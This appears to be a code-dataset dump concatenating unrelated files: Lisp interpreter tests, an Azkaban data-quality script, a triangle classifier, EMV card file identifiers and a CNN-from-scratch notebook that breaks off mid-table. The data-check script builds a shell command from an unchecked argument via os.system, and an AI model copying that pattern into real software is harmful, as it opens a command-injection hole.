@unittest.skipIf(0 < version < 6, '')
def test_load_file(self):
pl.REPL_STARTED = True
self.assertEqual(None, pl.load("define_variable_test.lisp"))
self.assertEqual(3, pl.evaluate(pl.parse("x")))
@unittest.skipIf(0 < version < 7, '')
def test_load_file_with_comments(self):
pl.REPL_STARTED = True
self.assertEqual(None, pl.load("comments_test.lisp"))
self.assertEqual(49, pl.evaluate(pl.parse("(square 7)")))
@unittest.skipIf(version not in [0, 7, 8], '')
def test_sqrt(self):
# verify that math functions are loaded properly; only need to verify one
self.assertEqual(4.0, pl.evaluate(pl.parse("(sqrt 16)")))
@unittest.skipIf(0 < version < 9, '')
def test_load_python(self):
# verify that Python module can be imported properly
pl.evaluate(pl.parse('(load-python (quote math))'))
self.assertEqual(4.0, pl.evaluate(pl.parse("(sqrt 16)")))
@unittest.skipIf(0 < version < 9, '')
def test_load_python_scope(self):
pl.REPL_STARTED = True
pl.load("scope_test.lisp")
self.assertEqual(3, pl.evaluate(pl.parse("(* 1 pi)")))
from math import pi
self.assertEqual(pi, pl.evaluate(pl.parse("(mul_pi 1)")))
class TestLogic(unittest.TestCase):
@unittest.skipIf(0 < version < 8, '')
def test_if(self):
# test "if", "#t", "#f"
pl.evaluate(pl.parse("(if #t (define x 1) (define x 2))"))
self.assertEqual(1, pl.evaluate(pl.parse("x")))
self.assertEqual(None, pl.evaluate(pl.parse("(if #f (define x 3) (define x 4))")))
self.assertEqual(4, pl.evaluate(pl.parse("x")))
@unittest.skipIf(0 < version < 8, '')
def test_not(self):
# test "if", "#t", "#f"
self.assertEqual(None, pl.evaluate(pl.parse("(if (not #t) (define x 1) (define x 2))")))
self.assertEqual(2, pl.evaluate(pl.parse("x")))
self.assertEqual(None, pl.evaluate(pl.parse("(if (not #f) (define x 3) (define x 4))")))
self.assertEqual(3, pl.evaluate(pl.parse("x")))
@unittest.skipIf(0 < version < 8, '')
def test_cond(self):
# test "cond", ">", ">" ,"="
expr = """
(define abs (lambda (x)
(cond ((> x 0) x)
((= x 0) 0)
((< x 0) (- x)))))"""
self.assertEqual(None, pl.evaluate(pl.parse(expr)))
self.assertEqual(2, pl.evaluate(pl.parse("(abs 2)")))
self.assertEqual(3, pl.evaluate(pl.parse("(abs -3)")))
self.assertEqual(0, pl.evaluate(pl.parse("(abs 0)")))
@unittest.skipIf(0 < version < 8, '')
def test_cond_with_else(self):
# test "cond", "else", "<="
expr = """
(define abs2 (lambda (x)
(cond ((<= x 0) (- x))
(else x)
)))"""
self.assertEqual(None, pl.evaluate(pl.parse(expr)))
self.assertEqual(2, pl.evaluate(pl.parse("(abs2 2)")))
self.assertEqual(3, pl.evaluate(pl.parse("(abs2 -3)")))
self.assertEqual(0, pl.evaluate(pl.parse("(abs2 0)")))
class TestLists(unittest.TestCase):
@unittest.skipIf(0 < version < 11, '')
def test_cons(self):
expr = "(define a (cons 1 (cons 2 (cons 3 (cons 4 '())))))"
expr2 = "'(1 2 3 4)"
pl.evaluate(pl.parse(expr))
self.assertEqual(pl.evaluate(pl.parse(expr2)), pl.evaluate(pl.parse("a")))
@unittest.skipIf(0 < version < 11, '')
def test_car(self):
expr = "(define a (cons 1 (cons 2 (cons 3 (cons 4 '())))))"
expr2 = "(car a)"
pl.evaluate(pl.parse(expr))
self.assertEqual(1, pl.evaluate(pl.parse(expr2)))
@unittest.skipIf(0 < version < 11, '')
def test_cdr(self):
expr = "(define a (cons 1 (cons 2 (cons 3 (cons 4 '())))))"
expr2 = "(cdr a)"
pl.evaluate(pl.parse(expr))
self.assertEqual(pl.evaluate(pl.parse("'(2 3 4)")), pl.evaluate(pl.parse(expr2)))
if __name__ == '__main__':
unittest.main()
| [
"andre.roberge@gmail.com"
] | andre.roberge@gmail.com |
99705d37c4bb2556f9d92625eb8702c25db105fe | e46d06a1642ce01395e81325380708d16fc4c268 | /development/data_supervisor/check_dim.py | a656c65c014145c9726bf78656afb03accd8fab8 | [] | no_license | scluojie/development | f90a954424a145834768a392933e29c72e39f1c5 | 96d439de404571a0d6df321337733b7fb3b1c2ef | refs/heads/main | 2023-09-02T21:58:12.839790 | 2021-11-21T03:57:18 | 2021-11-21T03:57:18 | 430,267,944 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 907 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from azclient import login, wait_node, get_exec_id
from check_notification import get_yesterday
def check_dim(dt, session_id, exec_id):
"""
检查DIM层数据质量
:param dt: 日期
:param session_id: 和azkaban通讯的session_id
:param exec_id: 指定的执行ID
:return: None
"""
if wait_node(session_id, exec_id, "ods_to_dim_db"):
os.system("bash check_dim.sh " + dt)
if __name__ == '__main__':
argv = sys.argv
# 获取session_id
session_id = login()
# 获取执行ID。只有在原Flow正在执行时才能获取
exec_id = get_exec_id(session_id)
# 获取日期,如果不存在取昨天
if len(argv) >= 2:
dt = argv[1]
else:
dt = get_yesterday()
# 检查各层数据质量
if exec_id:
check_dim(dt, session_id, exec_id)
| [
"1309077494@qq.com"
] | 1309077494@qq.com |
c7bf8d4a3c0aff487948a67314faa439b18b6655 | 44e90e8fa0170a0a710fe14d745794ac464e2650 | /typeoftriangle.py | 470b42a7dcbadadb8c7a7a96dc3ca800d0c1cdd6 | [] | no_license | ashwin-g-g/Python-tasks-MyCaptain | f94448d70d09c3c00961914025f761bda6c927dc | cefb386d5bd21a48b9fe77a3bcfe6917ee73c1e0 | refs/heads/master | 2020-12-04T19:19:54.935166 | 2020-01-05T06:59:15 | 2020-01-05T06:59:15 | 231,879,229 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 426 | py | side1 = input("Enter the 1st side of triangle: ")
side2= input("Enter the 2nd side of triangle: ")
side3= input("Enter the 3rd side of triangle: ")
if side1 == side2 and side2 == side3 and side1 == side3:
print("Equilateral triangle")
elif side1 != side2 and side2 != side3 and side1 != side3:
print("Scalene triangle")
elif side1 == side2 or side2 == side3 or side1 == side3:
print("Isosceles triangle")
| [
"noreply@github.com"
] | noreply@github.com |
d57bdb8960124be53b28f4bd5107c64047f6dc01 | a8809e4b2450abd39c5221397d99d118b190b277 | /src/apdu/FileIdentify.py | 6f75ddfffb646ce4753ce3e8025aebeca86e551a | [] | no_license | 0x554simon/ICCardTool | badecfec14b34178a0f05b7bdcc4785aca354502 | e81a7249ff3c8c69aa515de933a323a93b7808f0 | refs/heads/master | 2021-01-15T09:04:12.822083 | 2016-04-06T11:49:17 | 2016-04-06T11:49:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 558 | py | #-*-encoding:utf-8-*-
'''
Created on 2016-3-24
@author: ThinkPad
'''
class FileIdentify(object):
'''
define file's name in IC card
ONE PAY : PSE = 1PAY.SYS.DDF01 for PBOC ECC
TWO PAY : PPSE = 2PAY.SYS.DDF01 for QPBOC
DEBIT/CREBIT AID eg: A000000333010101,A000000333010102
'''
PSE = [0x31,0x50,0x41,0x59,0x2E,0x53,0x59,0x53,0x2E,0x44,0x44,0x46,0x30,0x31]
PPSE = [0x32,0x50,0x41,0x59,0x2E,0x53,0x59,0x53,0x2E,0x44,0x44,0x46,0x30,0x31]
def __init__(self,params):
'''
Constructor
'''
| [
"yixiangzhike007@163.com"
] | yixiangzhike007@163.com |
f971ae2ebcfdc1aca2cb4478a9cce077178d7fbc | 3b8383d0b7ea024be7efc0843dca66540e62c6de | /Course04_CNN/Convolution+model+-+Step+by+Step+-+v2.py | 4ba26060297a61bf34be84a2d86e9344e82c175c | [] | no_license | rendorHaevyn/Coursera_Deep_Learning | a178f412e42e2038c3ff1f37540c740082fef868 | 22b4e5ba9ebae807429cd5a6494acb72e2ee425e | refs/heads/master | 2020-03-20T17:01:51.914835 | 2018-11-10T10:38:38 | 2018-11-10T10:38:38 | 137,550,959 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 38,522 | py |
# coding: utf-8
# # Convolutional Neural Networks: Step by Step
#
# Welcome to Course 4's first assignment! In this assignment, you will implement convolutional (CONV) and pooling (POOL) layers in numpy, including both forward propagation and (optionally) backward propagation.
#
# **Notation**:
# - Superscript $[l]$ denotes an object of the $l^{th}$ layer.
# - Example: $a^{[4]}$ is the $4^{th}$ layer activation. $W^{[5]}$ and $b^{[5]}$ are the $5^{th}$ layer parameters.
#
#
# - Superscript $(i)$ denotes an object from the $i^{th}$ example.
# - Example: $x^{(i)}$ is the $i^{th}$ training example input.
#
#
# - Lowerscript $i$ denotes the $i^{th}$ entry of a vector.
# - Example: $a^{[l]}_i$ denotes the $i^{th}$ entry of the activations in layer $l$, assuming this is a fully connected (FC) layer.
#
#
# - $n_H$, $n_W$ and $n_C$ denote respectively the height, width and number of channels of a given layer. If you want to reference a specific layer $l$, you can also write $n_H^{[l]}$, $n_W^{[l]}$, $n_C^{[l]}$.
# - $n_{H_{prev}}$, $n_{W_{prev}}$ and $n_{C_{prev}}$ denote respectively the height, width and number of channels of the previous layer. If referencing a specific layer $l$, this could also be denoted $n_H^{[l-1]}$, $n_W^{[l-1]}$, $n_C^{[l-1]}$.
#
# We assume that you are already familiar with `numpy` and/or have completed the previous courses of the specialization. Let's get started!
# ## 1 - Packages
#
# Let's first import all the packages that you will need during this assignment.
# - [numpy](www.numpy.org) is the fundamental package for scientific computing with Python.
# - [matplotlib](http://matplotlib.org) is a library to plot graphs in Python.
# - np.random.seed(1) is used to keep all the random function calls consistent. It will help us grade your work.
# In[1]:
import numpy as np
import h5py
import matplotlib.pyplot as plt
get_ipython().magic('matplotlib inline')
plt.rcParams['figure.figsize'] = (5.0, 4.0) # set default size of plots
plt.rcParams['image.interpolation'] = 'nearest'
plt.rcParams['image.cmap'] = 'gray'
get_ipython().magic('load_ext autoreload')
get_ipython().magic('autoreload 2')
np.random.seed(1)
# ## 2 - Outline of the Assignment
#
# You will be implementing the building blocks of a convolutional neural network! Each function you will implement will have detailed instructions that will walk you through the steps needed:
#
# - Convolution functions, including:
# - Zero Padding
# - Convolve window
# - Convolution forward
# - Convolution backward (optional)
# - Pooling functions, including:
# - Pooling forward
# - Create mask
# - Distribute value
# - Pooling backward (optional)
#
# This notebook will ask you to implement these functions from scratch in `numpy`. In the next notebook, you will use the TensorFlow equivalents of these functions to build the following model:
#
# <img src="images/model.png" style="width:800px;height:300px;">
#
# **Note** that for every forward function, there is its corresponding backward equivalent. Hence, at every step of your forward module you will store some parameters in a cache. These parameters are used to compute gradients during backpropagation.
# ## 3 - Convolutional Neural Networks
#
# Although programming frameworks make convolutions easy to use, they remain one of the hardest concepts to understand in Deep Learning. A convolution layer transforms an input volume into an output volume of different size, as shown below.
#
# <img src="images/conv_nn.png" style="width:350px;height:200px;">
#
# In this part, you will build every step of the convolution layer. You will first implement two helper functions: one for zero padding and the other for computing the convolution function itself.
# ### 3.1 - Zero-Padding
#
# Zero-padding adds zeros around the border of an image:
#
# <img src="images/PAD.png" style="width:600px;height:400px;">
# <caption><center> <u> <font color='purple'> **Figure 1** </u><font color='purple'> : **Zero-Padding**<br> Image (3 channels, RGB) with a padding of 2. </center></caption>
#
# The main benefits of padding are the following:
#
# - It allows you to use a CONV layer without necessarily shrinking the height and width of the volumes. This is important for building deeper networks, since otherwise the height/width would shrink as you go to deeper layers. An important special case is the "same" convolution, in which the height/width is exactly preserved after one layer.
#
# - It helps us keep more of the information at the border of an image. Without padding, very few values at the next layer would be affected by pixels as the edges of an image.
#
# **Exercise**: Implement the following function, which pads all the images of a batch of examples X with zeros. [Use np.pad](https://docs.scipy.org/doc/numpy/reference/generated/numpy.pad.html). Note if you want to pad the array "a" of shape $(5,5,5,5,5)$ with `pad = 1` for the 2nd dimension, `pad = 3` for the 4th dimension and `pad = 0` for the rest, you would do:
# ```python
# a = np.pad(a, ((0,0), (1,1), (0,0), (3,3), (0,0)), 'constant', constant_values = (..,..))
# ```
# In[10]:
# GRADED FUNCTION: zero_pad
def zero_pad(X, pad):
"""
Pad with zeros all images of the dataset X. The padding is applied to the height and width of an image,
as illustrated in Figure 1.
Argument:
X -- python numpy array of shape (m, n_H, n_W, n_C) representing a batch of m images
pad -- integer, amount of padding around each image on vertical and horizontal dimensions
Returns:
X_pad -- padded image of shape (m, n_H + 2*pad, n_W + 2*pad, n_C)
"""
### START CODE HERE ### (≈ 1 line)
X_pad = np.pad(X, ((0,0),(pad,pad),(pad,pad),(0,0)), 'constant')
### END CODE HERE ###
return X_pad
# In[11]:
np.random.seed(1)
x = np.random.randn(4, 3, 3, 2)
x_pad = zero_pad(x, 2)
print ("x.shape =", x.shape)
print ("x_pad.shape =", x_pad.shape)
print ("x[1,1] =", x[1,1])
print ("x_pad[1,1] =", x_pad[1,1])
fig, axarr = plt.subplots(1, 2)
axarr[0].set_title('x')
axarr[0].imshow(x[0,:,:,0])
axarr[1].set_title('x_pad')
axarr[1].imshow(x_pad[0,:,:,0])
# **Expected Output**:
#
# <table>
# <tr>
# <td>
# **x.shape**:
# </td>
# <td>
# (4, 3, 3, 2)
# </td>
# </tr>
# <tr>
# <td>
# **x_pad.shape**:
# </td>
# <td>
# (4, 7, 7, 2)
# </td>
# </tr>
# <tr>
# <td>
# **x[1,1]**:
# </td>
# <td>
# [[ 0.90085595 -0.68372786]
# [-0.12289023 -0.93576943]
# [-0.26788808 0.53035547]]
# </td>
# </tr>
# <tr>
# <td>
# **x_pad[1,1]**:
# </td>
# <td>
# [[ 0. 0.]
# [ 0. 0.]
# [ 0. 0.]
# [ 0. 0.]
# [ 0. 0.]
# [ 0. 0.]
# [ 0. 0.]]
# </td>
# </tr>
#
# </table>
# ### 3.2 - Single step of convolution
#
# In this part, implement a single step of convolution, in which you apply the filter to a single position of the input. This will be used to build a convolutional unit, which:
#
# - Takes an input volume
# - Applies a filter at every position of the input
# - Outputs another volume (usually of different size)
#
# <img src="images/Convolution_schematic.gif" style="width:500px;height:300px;">
# <caption><center> <u> <font color='purple'> **Figure 2** </u><font color='purple'> : **Convolution operation**<br> with a filter of 2x2 and a stride of 1 (stride = amount you move the window each time you slide) </center></caption>
#
# In a computer vision application, each value in the matrix on the left corresponds to a single pixel value, and we convolve a 3x3 filter with the image by multiplying its values element-wise with the original matrix, then summing them up and adding a bias. In this first step of the exercise, you will implement a single step of convolution, corresponding to applying a filter to just one of the positions to get a single real-valued output.
#
# Later in this notebook, you'll apply this function to multiple positions of the input to implement the full convolutional operation.
#
# **Exercise**: Implement conv_single_step(). [Hint](https://docs.scipy.org/doc/numpy-1.13.0/reference/generated/numpy.sum.html).
#
# In[14]:
# GRADED FUNCTION: conv_single_step
def conv_single_step(a_slice_prev, W, b):
"""
Apply one filter defined by parameters W on a single slice (a_slice_prev) of the output activation
of the previous layer.
Arguments:
a_slice_prev -- slice of input data of shape (f, f, n_C_prev)
W -- Weight parameters contained in a window - matrix of shape (f, f, n_C_prev)
b -- Bias parameters contained in a window - matrix of shape (1, 1, 1)
Returns:
Z -- a scalar value, result of convolving the sliding window (W, b) on a slice x of the input data
"""
### START CODE HERE ### (≈ 2 lines of code)
# Element-wise product between a_slice and W. Do not add the bias yet.
s = np.multiply(a_slice_prev,W) # np.multiply = element wise; np.dot = matrix mult
# Sum over all entries of the volume s.
Z = np.sum(s)
# Add bias b to Z. Cast b to a float() so that Z results in a scalar value.
Z = Z + b
### END CODE HERE ###
return Z
# In[15]:
np.random.seed(1)
a_slice_prev = np.random.randn(4, 4, 3)
W = np.random.randn(4, 4, 3)
b = np.random.randn(1, 1, 1)
Z = conv_single_step(a_slice_prev, W, b)
print("Z =", Z)
# **Expected Output**:
# <table>
# <tr>
# <td>
# **Z**
# </td>
# <td>
# -6.99908945068
# </td>
# </tr>
#
# </table>
# ### 3.3 - Convolutional Neural Networks - Forward pass
#
# In the forward pass, you will take many filters and convolve them on the input. Each 'convolution' gives you a 2D matrix output. You will then stack these outputs to get a 3D volume:
#
# <center>
# <video width="620" height="440" src="images/conv_kiank.mp4" type="video/mp4" controls>
# </video>
# </center>
#
# **Exercise**: Implement the function below to convolve the filters W on an input activation A_prev. This function takes as input A_prev, the activations output by the previous layer (for a batch of m inputs), F filters/weights denoted by W, and a bias vector denoted by b, where each filter has its own (single) bias. Finally you also have access to the hyperparameters dictionary which contains the stride and the padding.
#
# **Hint**:
# 1. To select a 2x2 slice at the upper left corner of a matrix "a_prev" (shape (5,5,3)), you would do:
# ```python
# a_slice_prev = a_prev[0:2,0:2,:]
# ```
# This will be useful when you will define `a_slice_prev` below, using the `start/end` indexes you will define.
# 2. To define a_slice you will need to first define its corners `vert_start`, `vert_end`, `horiz_start` and `horiz_end`. This figure may be helpful for you to find how each of the corner can be defined using h, w, f and s in the code below.
#
# <img src="images/vert_horiz_kiank.png" style="width:400px;height:300px;">
# <caption><center> <u> <font color='purple'> **Figure 3** </u><font color='purple'> : **Definition of a slice using vertical and horizontal start/end (with a 2x2 filter)** <br> This figure shows only a single channel. </center></caption>
#
#
# **Reminder**:
# The formulas relating the output shape of the convolution to the input shape is:
# $$ n_H = \lfloor \frac{n_{H_{prev}} - f + 2 \times pad}{stride} \rfloor +1 $$
# $$ n_W = \lfloor \frac{n_{W_{prev}} - f + 2 \times pad}{stride} \rfloor +1 $$
# $$ n_C = \text{number of filters used in the convolution}$$
#
# For this exercise, we won't worry about vectorization, and will just implement everything with for-loops.
# In[28]:
# GRADED FUNCTION: conv_forward
def conv_forward(A_prev, W, b, hparameters):
"""
Implements the forward propagation for a convolution function
Arguments:
A_prev -- output activations of the previous layer, numpy array of shape (m, n_H_prev, n_W_prev, n_C_prev)
W -- Weights, numpy array of shape (f, f, n_C_prev, n_C)
b -- Biases, numpy array of shape (1, 1, 1, n_C)
hparameters -- python dictionary containing "stride" and "pad"
Returns:
Z -- conv output, numpy array of shape (m, n_H, n_W, n_C)
cache -- cache of values needed for the conv_backward() function
"""
### START CODE HERE ###
# Retrieve dimensions from A_prev's shape (≈1 line)
(m, n_H_prev, n_W_prev, n_C_prev) = A_prev.shape
# Retrieve dimensions from W's shape (≈1 line)
(f, f, n_C_prev, n_C) = W.shape
# Retrieve information from "hparameters" (≈2 lines)
stride = hparameters['stride']
pad = hparameters['pad']
# Compute the dimensions of the CONV output volume using the formula given above. Hint: use int() to floor. (≈2 lines)
n_H = int((n_H_prev - f + (2*pad)) / stride) + 1
n_W = int((n_W_prev - f + (2*pad)) / stride) + 1
# Initialize the output volume Z with zeros. (≈1 line)
Z = np.zeros((m, n_H, n_W, n_C))
# Create A_prev_pad by padding A_prev
A_prev_pad = zero_pad(A_prev, pad)
for i in range(m): # loop over the batch of training examples
a_prev_pad = A_prev_pad[i] # Select ith training example's padded activation
for h in range(n_H): # loop over vertical axis of the output volume
for w in range(n_W): # loop over horizontal axis of the output volume
for c in range(n_C): # loop over channels (= #filters) of the output volume
# Find the corners of the current "slice" (≈4 lines)
vert_start = h * stride
vert_end = vert_start + f
horiz_start = w * stride
horiz_end = horiz_start + f
# Use the corners to define the (3D) slice of a_prev_pad (See Hint above the cell). (≈1 line)
a_slice_prev = a_prev_pad[vert_start:vert_end, horiz_start:horiz_end, :]
# Convolve the (3D) slice with the correct filter W and bias b, to get back one output neuron. (≈1 line)
Z[i, h, w, c] = conv_single_step(a_slice_prev, W[:,:,:,c], b[:,:,:,c])
### END CODE HERE ###
# Making sure your output shape is correct
assert(Z.shape == (m, n_H, n_W, n_C))
# Save information in "cache" for the backprop
cache = (A_prev, W, b, hparameters)
return Z, cache
# In[29]:
np.random.seed(1)
A_prev = np.random.randn(10,4,4,3)
W = np.random.randn(2,2,3,8)
b = np.random.randn(1,1,1,8)
hparameters = {"pad" : 2,
"stride": 2}
Z, cache_conv = conv_forward(A_prev, W, b, hparameters)
print("Z's mean =", np.mean(Z))
print("Z[3,2,1] =", Z[3,2,1])
print("cache_conv[0][1][2][3] =", cache_conv[0][1][2][3])
# **Expected Output**:
#
# <table>
# <tr>
# <td>
# **Z's mean**
# </td>
# <td>
# 0.0489952035289
# </td>
# </tr>
# <tr>
# <td>
# **Z[3,2,1]**
# </td>
# <td>
# [-0.61490741 -6.7439236 -2.55153897 1.75698377 3.56208902 0.53036437
# 5.18531798 8.75898442]
# </td>
# </tr>
# <tr>
# <td>
# **cache_conv[0][1][2][3]**
# </td>
# <td>
# [-0.20075807 0.18656139 0.41005165]
# </td>
# </tr>
#
# </table>
#
# Finally, CONV layer should also contain an activation, in which case we would add the following line of code:
#
# ```python
# # Convolve the window to get back one output neuron
# Z[i, h, w, c] = ...
# # Apply activation
# A[i, h, w, c] = activation(Z[i, h, w, c])
# ```
#
# You don't need to do it here.
#
# ## 4 - Pooling layer
#
# The pooling (POOL) layer reduces the height and width of the input. It helps reduce computation, as well as helps make feature detectors more invariant to its position in the input. The two types of pooling layers are:
#
# - Max-pooling layer: slides an ($f, f$) window over the input and stores the max value of the window in the output.
#
# - Average-pooling layer: slides an ($f, f$) window over the input and stores the average value of the window in the output.
#
# <table>
# <td>
# <img src="images/max_pool1.png" style="width:500px;height:300px;">
# <td>
#
# <td>
# <img src="images/a_pool.png" style="width:500px;height:300px;">
# <td>
# </table>
#
# These pooling layers have no parameters for backpropagation to train. However, they have hyperparameters such as the window size $f$. This specifies the height and width of the fxf window you would compute a max or average over.
#
# ### 4.1 - Forward Pooling
# Now, you are going to implement MAX-POOL and AVG-POOL, in the same function.
#
# **Exercise**: Implement the forward pass of the pooling layer. Follow the hints in the comments below.
#
# **Reminder**:
# As there's no padding, the formulas binding the output shape of the pooling to the input shape is:
# $$ n_H = \lfloor \frac{n_{H_{prev}} - f}{stride} \rfloor +1 $$
# $$ n_W = \lfloor \frac{n_{W_{prev}} - f}{stride} \rfloor +1 $$
# $$ n_C = n_{C_{prev}}$$
# In[31]:
# GRADED FUNCTION: pool_forward
def pool_forward(A_prev, hparameters, mode = "max"):
"""
Implements the forward pass of the pooling layer
Arguments:
A_prev -- Input data, numpy array of shape (m, n_H_prev, n_W_prev, n_C_prev)
hparameters -- python dictionary containing "f" and "stride"
mode -- the pooling mode you would like to use, defined as a string ("max" or "average")
Returns:
A -- output of the pool layer, a numpy array of shape (m, n_H, n_W, n_C)
cache -- cache used in the backward pass of the pooling layer, contains the input and hparameters
"""
# Retrieve dimensions from the input shape
(m, n_H_prev, n_W_prev, n_C_prev) = A_prev.shape
# Retrieve hyperparameters from "hparameters"
f = hparameters["f"]
stride = hparameters["stride"]
# Define the dimensions of the output
n_H = int(1 + (n_H_prev - f) / stride)
n_W = int(1 + (n_W_prev - f) / stride)
n_C = n_C_prev
# Initialize output matrix A
A = np.zeros((m, n_H, n_W, n_C))
### START CODE HERE ###
for i in range(m): # loop over the training examples
for h in range(n_H): # loop on the vertical axis of the output volume
for w in range(n_W): # loop on the horizontal axis of the output volume
for c in range (n_C): # loop over the channels of the output volume
# Find the corners of the current "slice" (≈4 lines)
vert_start = h * stride
vert_end = vert_start + f
horiz_start = w * stride
horiz_end = horiz_start + f
# Use the corners to define the current slice on the ith training example of A_prev, channel c. (≈1 line)
a_prev_slice = A_prev[i, vert_start:vert_end, horiz_start:horiz_end, c]
# Compute the pooling operation on the slice. Use an if statment to differentiate the modes. Use np.max/np.mean.
if mode == "max":
A[i, h, w, c] = np.max(a_prev_slice)
elif mode == "average":
A[i, h, w, c] = np.mean(a_prev_slice)
### END CODE HERE ###
# Store the input and hparameters in "cache" for pool_backward()
cache = (A_prev, hparameters)
# Making sure your output shape is correct
assert(A.shape == (m, n_H, n_W, n_C))
return A, cache
# In[32]:
np.random.seed(1)
A_prev = np.random.randn(2, 4, 4, 3)
hparameters = {"stride" : 2, "f": 3}
A, cache = pool_forward(A_prev, hparameters)
print("mode = max")
print("A =", A)
print()
A, cache = pool_forward(A_prev, hparameters, mode = "average")
print("mode = average")
print("A =", A)
# **Expected Output:**
# <table>
#
# <tr>
# <td>
# A =
# </td>
# <td>
# [[[[ 1.74481176 0.86540763 1.13376944]]]
#
#
# [[[ 1.13162939 1.51981682 2.18557541]]]]
#
# </td>
# </tr>
# <tr>
# <td>
# A =
# </td>
# <td>
# [[[[ 0.02105773 -0.20328806 -0.40389855]]]
#
#
# [[[-0.22154621 0.51716526 0.48155844]]]]
#
# </td>
# </tr>
#
# </table>
#
# Congratulations! You have now implemented the forward passes of all the layers of a convolutional network.
#
# The remainer of this notebook is optional, and will not be graded.
#
# ## 5 - Backpropagation in convolutional neural networks (OPTIONAL / UNGRADED)
#
# In modern deep learning frameworks, you only have to implement the forward pass, and the framework takes care of the backward pass, so most deep learning engineers don't need to bother with the details of the backward pass. The backward pass for convolutional networks is complicated. If you wish however, you can work through this optional portion of the notebook to get a sense of what backprop in a convolutional network looks like.
#
# When in an earlier course you implemented a simple (fully connected) neural network, you used backpropagation to compute the derivatives with respect to the cost to update the parameters. Similarly, in convolutional neural networks you can to calculate the derivatives with respect to the cost in order to update the parameters. The backprop equations are not trivial and we did not derive them in lecture, but we briefly presented them below.
#
# ### 5.1 - Convolutional layer backward pass
#
# Let's start by implementing the backward pass for a CONV layer.
#
# #### 5.1.1 - Computing dA:
# This is the formula for computing $dA$ with respect to the cost for a certain filter $W_c$ and a given training example:
#
# $$ dA += \sum _{h=0} ^{n_H} \sum_{w=0} ^{n_W} W_c \times dZ_{hw} \tag{1}$$
#
# Where $W_c$ is a filter and $dZ_{hw}$ is a scalar corresponding to the gradient of the cost with respect to the output of the conv layer Z at the hth row and wth column (corresponding to the dot product taken at the ith stride left and jth stride down). Note that at each time, we multiply the the same filter $W_c$ by a different dZ when updating dA. We do so mainly because when computing the forward propagation, each filter is dotted and summed by a different a_slice. Therefore when computing the backprop for dA, we are just adding the gradients of all the a_slices.
#
# In code, inside the appropriate for-loops, this formula translates into:
# ```python
# da_prev_pad[vert_start:vert_end, horiz_start:horiz_end, :] += W[:,:,:,c] * dZ[i, h, w, c]
# ```
#
# #### 5.1.2 - Computing dW:
# This is the formula for computing $dW_c$ ($dW_c$ is the derivative of one filter) with respect to the loss:
#
# $$ dW_c += \sum _{h=0} ^{n_H} \sum_{w=0} ^ {n_W} a_{slice} \times dZ_{hw} \tag{2}$$
#
# Where $a_{slice}$ corresponds to the slice which was used to generate the acitivation $Z_{ij}$. Hence, this ends up giving us the gradient for $W$ with respect to that slice. Since it is the same $W$, we will just add up all such gradients to get $dW$.
#
# In code, inside the appropriate for-loops, this formula translates into:
# ```python
# dW[:,:,:,c] += a_slice * dZ[i, h, w, c]
# ```
#
# #### 5.1.3 - Computing db:
#
# This is the formula for computing $db$ with respect to the cost for a certain filter $W_c$:
#
# $$ db = \sum_h \sum_w dZ_{hw} \tag{3}$$
#
# As you have previously seen in basic neural networks, db is computed by summing $dZ$. In this case, you are just summing over all the gradients of the conv output (Z) with respect to the cost.
#
# In code, inside the appropriate for-loops, this formula translates into:
# ```python
# db[:,:,:,c] += dZ[i, h, w, c]
# ```
#
# **Exercise**: Implement the `conv_backward` function below. You should sum over all the training examples, filters, heights, and widths. You should then compute the derivatives using formulas 1, 2 and 3 above.
# In[ ]:
# In[37]:
def conv_backward(dZ, cache):
"""
Implement the backward propagation for a convolution function
Arguments:
dZ -- gradient of the cost with respect to the output of the conv layer (Z), numpy array of shape (m, n_H, n_W, n_C)
cache -- cache of values needed for the conv_backward(), output of conv_forward()
Returns:
dA_prev -- gradient of the cost with respect to the input of the conv layer (A_prev),
numpy array of shape (m, n_H_prev, n_W_prev, n_C_prev)
dW -- gradient of the cost with respect to the weights of the conv layer (W)
numpy array of shape (f, f, n_C_prev, n_C)
db -- gradient of the cost with respect to the biases of the conv layer (b)
numpy array of shape (1, 1, 1, n_C)
"""
### START CODE HERE ###
# Retrieve information from "cache"
(A_prev, W, b, hparameters) = cache
# Retrieve dimensions from A_prev's shape
(m, n_H_prev, n_W_prev, n_C_prev) = A_prev.shape
# Retrieve dimensions from W's shape
(f, f, n_C_prev, n_C) = W.shape
# Retrieve information from "hparameters"
stride = hparameters['stride']
pad = hparameters['pad']
# Retrieve dimensions from dZ's shape
(m, n_H, n_W, n_C) = dZ.shape
# Initialize dA_prev, dW, db with the correct shapes
dA_prev = np.zeros(A_prev.shape)
dW = np.zeros(W.shape)
db = np.zeros((1,1,1,n_C))
# Pad A_prev and dA_prev
A_prev_pad = zero_pad(A_prev, pad)
dA_prev_pad = zero_pad(dA_prev, pad)
for i in range(m): # loop over the training examples
# select ith training example from A_prev_pad and dA_prev_pad
a_prev_pad = A_prev_pad[i]
da_prev_pad = dA_prev_pad[i]
for h in range(n_H): # loop over vertical axis of the output volume
for w in range(n_W): # loop over horizontal axis of the output volume
for c in range(n_C): # loop over the channels of the output volume
# Find the corners of the current "slice"
vert_start = h * stride
vert_end = vert_start + f
horiz_start = w * stride
horiz_end = horiz_start + f
# Use the corners to define the slice from a_prev_pad
a_slice = a_prev_pad[vert_start:vert_end, horiz_start:horiz_end, :]
# Update gradients for the window and the filter's parameters using the code formulas given above
da_prev_pad[vert_start:vert_end, horiz_start:horiz_end, :] += W[:,:,:,c] * dZ[i, h, w, c]
dW[:,:,:,c] += a_slice * dZ[i, h, w, c]
db[:,:,:,c] += dZ[i, h, w, c]
# Set the ith training example's dA_prev to the unpaded da_prev_pad (Hint: use X[pad:-pad, pad:-pad, :])
dA_prev[i, :, :, :] = da_prev_pad[pad:-pad, pad:-pad, :]
### END CODE HERE ###
# Making sure your output shape is correct
assert(dA_prev.shape == (m, n_H_prev, n_W_prev, n_C_prev))
return dA_prev, dW, db
# In[38]:
np.random.seed(1)
dA, dW, db = conv_backward(Z, cache_conv)
print("dA_mean =", np.mean(dA))
print("dW_mean =", np.mean(dW))
print("db_mean =", np.mean(db))
# ** Expected Output: **
# <table>
# <tr>
# <td>
# **dA_mean**
# </td>
# <td>
# 1.45243777754
# </td>
# </tr>
# <tr>
# <td>
# **dW_mean**
# </td>
# <td>
# 1.72699145831
# </td>
# </tr>
# <tr>
